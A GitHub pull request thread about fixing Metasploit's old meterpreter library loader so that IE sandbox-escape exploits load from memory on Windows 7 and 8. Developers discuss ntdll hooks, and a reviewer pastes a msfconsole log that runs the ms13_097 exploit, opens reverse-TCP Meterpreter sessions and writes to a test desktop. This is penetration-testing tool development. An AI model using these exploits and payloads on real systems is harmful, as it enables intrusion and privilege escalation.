Fix old win libloader to work under Win7 and Win8

[jvazquez-r7]

This pull request tries to update the old windows meterpreter library loader to work under Win7 and Win8 when loading libraries from memory.

Actually meterpreter uses Reflective DLL Loader as its main loader on Windows. The reflective DLL loader avoids using LoadLibrary and the OS loader in order to be stealthy, which is awesome. But I found a particular situation where the old library loader was pretty useful. It was while porting some of the IE Sandbox bypasses from James Forshaw to metasploit:

rapid7/metasploit-framework#3402
rapid7/metasploit-framework#3403
rapid7/metasploit-framework#3404

In order to abuse these policies weaknesses you need the vulnerable process (IE Low Privilege) to load the exploit through LoadLibrary in order to apply the sandboxing. Otherwise policies don't apply and Process Created from the IE are always Low Privilege.

That said, this pull request just tries to fix the old meterpreter library loader to work under Windows 7 and Windows 8 when loading a library from memory, so we don't need to drop the exploit lib to disk. In oder to do it:

• Adds a hook for ntdll!NtClose to avoid crashing on Windows7 (and newer versions I guess).
• Modifies the ntdll! NtMapViewOfSection hook to modify the ViewSize parameter, otherwise further loading fails under Windows 7 and newer.

Verification steps

• Use this branch to generate the Release objects
• With the modified meterpreter test Add module for CVE-2013-5045 metasploit-framework#3403 and/or Add module for CVE-2014-0257 metasploit-framework#3404. They should work on Windows 7 and Windows 8.

[metasploit-public-bot]

Can one of the admins verify this patch? For more information see: https://github.com/rapid7/meterpreter/wiki/CI-Testing

[OJ]

jenkins, add to whitelist

[OJ]

Hey @jvazquez-r7, I'll take a look at this today once the kids have headed out to school!

[kernelsmith]

jenkins, make me a sandwich

On May 29, 2014, at 4:03 PM, OJ Reeves [email protected] wrote:

Hey @jvazquez-r7, I'll take a look at this today once the kids have headed out to school!

—
Reply to this email directly or view it on GitHub.

[metasploit-public-bot]

Test PASSED.
Refer to this link for build results: https://ci.metasploit.com/job/GPR-MeterpreterWin/103/

[jvazquez-r7]

thanks @OJ , btw, gimme a sec, noticed a bug at least... shame...

[OJ]

OK mate, no worries.!

[OJ]

Very minor indenting issues here, because the existing source uses tabs instead of spaces.

[jvazquez-r7]

mmm I'm using tabs too :?

[jvazquez-r7]

damnt it... visual studio.... what are you doing with indention?

[jvazquez-r7]

@OJ, should I do any configuration in visual studio to make it compatible with the current meterpreter indention?

[OJ]

That's a good question :P I left mine as the default (which I don't usually do, because I prefer spaces over tabs). So whatever is default should be fine.

Visual Studio is an epic troll ;)

[jvazquez-r7]

otherwise I've fixed the bug I just spot. guidance about the full pull request is welcome =)

[OJ]

Roger that! Scan of the code looks fine. Will test when the kids are out the door!

[metasploit-public-bot]

Test PASSED.
Refer to this link for build results: https://ci.metasploit.com/job/GPR-MeterpreterWin/104/

[OJ]

Tested rapid7/metasploit-framework#3403 on Windows 7:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.1.10.40:8000
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.40
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.40:37326) at 2014-05-30 08:24:59 +1000

meterpreter > migrate 1556
[*] Migrating from 1756 to 1556...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploits/windows/local/ms13_097_ie_registry_symlink
msf exploit(ms13_097_ie_registry_symlink) > set session 1
session => 1
msf exploit(ms13_097_ie_registry_symlink) > set SRVHOST 10.1.10.40
SRVHOST => 10.1.10.40
msf exploit(ms13_097_ie_registry_symlink) > set SRVPORT 4444
SRVPORT => 4444
msf exploit(ms13_097_ie_registry_symlink) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms13_097_ie_registry_symlink) > set LHOST 10.1.10.40
LHOST => 10.1.10.40
msf exploit(ms13_097_ie_registry_symlink) > set LPORT 5555
LPORT => 5555
msf exploit(ms13_097_ie_registry_symlink) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.1.10.40:5555
[*] Running module against WIN-IV7GVO41GAT
[*] Using URL: http://10.1.10.40:4444/FLsCplXFiR
[*] Server started.
[*] Loading Exploit Library...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending window close html...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending window close html...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending hta...
[*] 10.1.10.40       ms13_097_ie_registry_symlink - Sending psh payload...
[*] Sending stage (770048 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:5555 -> 10.1.10.40:53582) at 2014-05-30 08:33:09 +1000
[*] Server stopped.

meterpreter > pwd
C:\Users\noob\Desktop
meterpreter > mkdir msf_pwned
Creating directory: msf_pwned
meterpreter > ls

Listing: C:\Users\noob\Desktop
==============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40555/r-xr-xr-x   0      dir   2014-05-30 08:33:33 +1000  .
40777/rwxrwxrwx   0      dir   2014-05-30 08:21:09 +1000  ..
100666/rw-rw-rw-  282    fil   2014-05-30 08:21:09 +1000  desktop.ini
40777/rwxrwxrwx   0      dir   2014-05-30 08:33:33 +1000  msf_pwned

meterpreter >

[OJ]

@jvazquez-r7 Which version of IE should this work on with Windows 8? And do I need any particular patch level for Windows 8?

[jvazquez-r7]

@OJ, you'll need and out of date installation without the MS patches in the modules pull requests. IE10 and IE11 should work.Honestly, on Win8 I just tested the loader was working with a dummy DLL (shame...).

[OJ]

I don't have an out of date installation of Windows 8 :( Will take me some time to get it set up. @Meatballs1 have you got a VM lying around?

[Meatballs1]

Any ideas why RDLL didn't work? The process should be sandboxed and the DLL is just loaded within the process? Is the IE User Broker thing not hooking CreateProcess (etc) from the DLL because of the way RDLL is loaded?

What about RDLL with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR defined?

[Meatballs1]

@OJ this PR can be verified with a simple HelloWorld dll? The patches only apply to the exploits but the ability to LoadLibrary isn't patched.

[OJ]

@Meatballs1 yeah I was just hoping to see an end-to-end "real world" not just "hello world" scenario :)

[jvazquez-r7]

@Meatballs1 right about reflective DLL injection.

[OJ]

This is looking fine to me.